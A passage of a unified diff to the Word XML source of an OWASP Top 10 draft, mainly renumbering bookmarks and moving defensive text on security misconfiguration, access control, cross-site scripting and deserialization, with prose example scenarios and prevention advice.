-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="59" w:name="owasp-3"/>
-      <w:bookmarkEnd w:id="59"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -7825,8 +7819,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="60" w:name="external-3"/>
-      <w:bookmarkEnd w:id="60"/>
+      <w:bookmarkStart w:id="59" w:name="external-3"/>
+      <w:bookmarkEnd w:id="59"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -7873,10 +7867,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="61" w:name="__RefHeading___Toc2384_1944273953"/>
-      <w:bookmarkStart w:id="62" w:name="a5-security-misconfiguration"/>
+      <w:bookmarkStart w:id="60" w:name="__RefHeading___Toc2373_410054668"/>
+      <w:bookmarkStart w:id="61" w:name="a5-security-misconfiguration"/>
+      <w:bookmarkEnd w:id="60"/>
       <w:bookmarkEnd w:id="61"/>
-      <w:bookmarkEnd w:id="62"/>
       <w:r>
         <w:rPr/>
         <w:t>A5 Security Misconfiguration</w:t>
@@ -8105,8 +8099,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="63" w:name="am-i-vulnerable-to-attack-4"/>
-      <w:bookmarkEnd w:id="63"/>
+      <w:bookmarkStart w:id="62" w:name="am-i-vulnerable-to-attack-4"/>
+      <w:bookmarkEnd w:id="62"/>
       <w:r>
         <w:rPr/>
         <w:t>Am I vulnerable to attack?</w:t>
@@ -8237,11 +8231,89 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="64" w:name="how-do-i-prevent-4"/>
+      <w:bookmarkStart w:id="63" w:name="how-do-i-prevent-4"/>
+      <w:bookmarkEnd w:id="63"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The primary recommendations are to establish all of the following:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This process needs to include all components and libraries as well (see 2017-A9). Get get accustomed to new security features.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>A strong application architecture that provides effective, secure separation between components.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="32"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>An automated process to verify independently the effectiveness of the configurations and settings in all environments.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="64" w:name="example-scenarios-4"/>
       <w:bookmarkEnd w:id="64"/>
       <w:r>
         <w:rPr/>
-        <w:t>How do I prevent</w:t>
+        <w:t>Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8251,63 +8323,47 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>The primary recommendations are to establish all of the following:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="32"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="32"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This process needs to include all components and libraries as well (see 2017-A9). Get get accustomed to new security features.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="32"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>A strong application architecture that provides effective, secure separation between components.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="32"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>An automated process to verify independently the effectiveness of the configurations and settings in all environments.</w:t>
+        <w:t>Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Scenario #5: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an attacker or malware.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8315,82 +8371,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="65" w:name="example-scenarios-4"/>
+      <w:bookmarkStart w:id="65" w:name="references-4"/>
       <w:bookmarkEnd w:id="65"/>
       <w:r>
         <w:rPr/>
-        <w:t>Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Scenario #5: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an attacker or malware.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="66" w:name="references-4"/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="66" w:name="owasp-4"/>
       <w:bookmarkEnd w:id="66"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="67" w:name="owasp-4"/>
-      <w:bookmarkEnd w:id="67"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -8543,64 +8537,64 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="68" w:name="external-4"/>
+      <w:bookmarkStart w:id="67" w:name="external-4"/>
+      <w:bookmarkEnd w:id="67"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>External</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>NIST Guide to General Server Hardening</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>CWE Entry 2 on Environmental Security Flaws</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>CIS Security Configuration Guides/Benchmarks</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="68" w:name="__RefHeading___Toc2375_410054668"/>
+      <w:bookmarkStart w:id="69" w:name="a6-access-control"/>
       <w:bookmarkEnd w:id="68"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>External</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="34"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>NIST Guide to General Server Hardening</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="34"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>CWE Entry 2 on Environmental Security Flaws</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="34"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>CIS Security Configuration Guides/Benchmarks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="__RefHeading___Toc2386_1944273953"/>
-      <w:bookmarkStart w:id="70" w:name="a6-access-control"/>
       <w:bookmarkEnd w:id="69"/>
-      <w:bookmarkEnd w:id="70"/>
       <w:r>
         <w:rPr/>
         <w:t>A6 Access Control</w:t>
@@ -8829,8 +8823,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="71" w:name="am-i-vulnerable-to-attack-5"/>
-      <w:bookmarkEnd w:id="71"/>
+      <w:bookmarkStart w:id="70" w:name="am-i-vulnerable-to-attack-5"/>
+      <w:bookmarkEnd w:id="70"/>
       <w:r>
         <w:rPr/>
         <w:t>Am I vulnerable to attack?</w:t>
@@ -9003,8 +8997,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="72" w:name="how-do-i-prevent-5"/>
-      <w:bookmarkEnd w:id="72"/>
+      <w:bookmarkStart w:id="71" w:name="how-do-i-prevent-5"/>
+      <w:bookmarkEnd w:id="71"/>
       <w:r>
         <w:rPr/>
         <w:t>How do I prevent</w:t>
@@ -9239,8 +9233,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="73" w:name="example-scenarios-5"/>
-      <w:bookmarkEnd w:id="73"/>
+      <w:bookmarkStart w:id="72" w:name="example-scenarios-5"/>
+      <w:bookmarkEnd w:id="72"/>
       <w:r>
         <w:rPr/>
         <w:t>Example Scenarios</w:t>
@@ -9353,20 +9347,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="74" w:name="references-5"/>
+      <w:bookmarkStart w:id="73" w:name="references-5"/>
+      <w:bookmarkEnd w:id="73"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="74" w:name="owasp-5"/>
       <w:bookmarkEnd w:id="74"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="75" w:name="owasp-5"/>
-      <w:bookmarkEnd w:id="75"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -9469,8 +9463,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="76" w:name="external-5"/>
-      <w:bookmarkEnd w:id="76"/>
+      <w:bookmarkStart w:id="75" w:name="external-5"/>
+      <w:bookmarkEnd w:id="75"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -9549,10 +9543,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="77" w:name="__RefHeading___Toc2388_1944273953"/>
-      <w:bookmarkStart w:id="78" w:name="a7-cross-site-scripting"/>
+      <w:bookmarkStart w:id="76" w:name="__RefHeading___Toc2377_410054668"/>
+      <w:bookmarkStart w:id="77" w:name="a7-cross-site-scripting"/>
+      <w:bookmarkEnd w:id="76"/>
       <w:bookmarkEnd w:id="77"/>
-      <w:bookmarkEnd w:id="78"/>
       <w:r>
         <w:rPr/>
         <w:t>A7 Cross Site Scripting</w:t>
@@ -9781,8 +9775,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="79" w:name="am-i-vulnerable-to-attack-6"/>
-      <w:bookmarkEnd w:id="79"/>
+      <w:bookmarkStart w:id="78" w:name="am-i-vulnerable-to-attack-6"/>
+      <w:bookmarkEnd w:id="78"/>
       <w:r>
         <w:rPr/>
         <w:t>Am I vulnerable to attack?</w:t>
@@ -9903,8 +9897,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="80" w:name="how-do-i-prevent-6"/>
-      <w:bookmarkEnd w:id="80"/>
+      <w:bookmarkStart w:id="79" w:name="how-do-i-prevent-6"/>
+      <w:bookmarkEnd w:id="79"/>
       <w:r>
         <w:rPr/>
         <w:t>How do I prevent</w:t>
@@ -10047,8 +10041,8 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="81" w:name="example-scenarios-6"/>
-      <w:bookmarkEnd w:id="81"/>
+      <w:bookmarkStart w:id="80" w:name="example-scenarios-6"/>
+      <w:bookmarkEnd w:id="80"/>
       <w:r>
         <w:rPr/>
         <w:t>Example Scenarios</w:t>
@@ -10115,20 +10109,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="82" w:name="references-6"/>
+      <w:bookmarkStart w:id="81" w:name="references-6"/>
+      <w:bookmarkEnd w:id="81"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="82" w:name="owasp-6"/>
       <w:bookmarkEnd w:id="82"/>
-      <w:r>
-        <w:rPr/>
-        <w:t>References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:bookmarkStart w:id="83" w:name="owasp-6"/>
-      <w:bookmarkEnd w:id="83"/>
       <w:r>
         <w:rPr/>
         <w:t>OWASP</w:t>
@@ -10321,8 +10315,8 @@
         <w:pStyle w:val="Heading3"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="84" w:name="external-6"/>
-      <w:bookmarkEnd w:id="84"/>
+      <w:bookmarkStart w:id="83" w:name="external-6"/>
+      <w:bookmarkEnd w:id="83"/>
       <w:r>
         <w:rPr/>
         <w:t>External</w:t>
@@ -10369,10 +10363,10 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="85" w:name="__RefHeading___Toc2390_1944273953"/>
-      <w:bookmarkStart w:id="86" w:name="a8-deserialization"/>
+      <w:bookmarkStart w:id="84" w:name="__RefHeading___Toc2379_410054668"/>
+      <w:bookmarkStart w:id="85" w:name="a8-deserialization"/>
+      <w:bookmarkEnd w:id="84"/>
       <w:bookmarkEnd w:id="85"/>
-      <w:bookmarkEnd w:id="86"/>
       <w:r>
         <w:rPr/>
         <w:t>A8 Deserialization</w:t>
@@ -10601,11 +10595,113 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="87" w:name="am-i-vulnerable-to-attack-7"/>
+      <w:bookmarkStart w:id="86" w:name="am-i-vulnerable-to-attack-7"/>
+      <w:bookmarkEnd w:id="86"/>
+      <w:r>
+        <w:rPr/>
+        <w:t>Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Application architecture has changed dramatically over the last few years, with the move to "server-less" API driven mobile and single page applications, with the associated rise of functional programming frameworks and languages. This seismic shift in application architecture were accompanied by the idea of the client maintaining state, to allow theoretical simpler and more scalable functional code. However, the hallmark of application security is the location of trusted state. Security state cannot be sent to the client without some form of integrity promise.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Applications and APIs will be vulnerable if the code:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The client can create, replay, tamper, or chain existing serialized state (gadgets), AND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The server or API deserializes hostile objects supplied by an attacker, AND</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The objects contain a constructor, destructor, callbacks, auto-instantiation (such as rehydration calls) OR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="46"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The objects override protected or private member fields that contain sensitive state, such as role or similar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="87" w:name="how-do-i-prevent-7"/>
       <w:bookmarkEnd w:id="87"/>
       <w:r>
         <w:rPr/>
-        <w:t>Am I vulnerable to attack?</w:t>
+        <w:t>How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="47"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The only safe architectural pattern is to not send or accept serialized objects from untrusted sources</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10615,73 +10711,115 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>Application architecture has changed dramatically over the last few years, with the move to "server-less" API driven mobile and single page applications, with the associated rise of functional programming frameworks and languages. This seismic shift in application architecture were accompanied by the idea of the client maintaining state, to allow theoretical simpler and more scalable functional code. However, the hallmark of application security is the location of trusted state. Security state cannot be sent to the client without some form of integrity promise.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TextBody"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>Applications and APIs will be vulnerable if the code:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The client can create, replay, tamper, or chain existing serialized state (gadgets), AND</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The server or API deserializes hostile objects supplied by an attacker, AND</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The objects contain a constructor, destructor, callbacks, auto-instantiation (such as rehydration calls) OR</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="46"/>
-        </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The objects override protected or private member fields that contain sensitive state, such as role or similar</w:t>
+        <w:t>If this not possible</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="48"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Implement integrity checks or encryption of the serialized objects to prevent hostile creation, tampering, replay and gadget calls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="48"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Isolate code that deserializes, such that it runs in very low privilege environments, such as temporary containers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="48"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Enforce type constraints over serialized objects; typically code is expecting a particular class</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="48"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Larger and high performing organizations should also consider:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="49"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Rate limit API or methods that deserialize</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="49"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Restrict or monitor incoming and outgoing network connectivity from containers or servers that deserialize</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="49"/>
+        </w:numPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Monitor deserialization, alerting if a user deserializes constantly.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10689,164 +10827,20 @@
         <w:pStyle w:val="Heading2"/>
         <w:rPr/>
       </w:pPr>
-      <w:bookmarkStart w:id="88" w:name="how-do-i-prevent-7"/>
+      <w:bookmarkStart w:id="88" w:name="references-7"/>
       <w:bookmarkEnd w:id="88"/>
       <w:r>
         <w:rPr/>
-        <w:t>How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
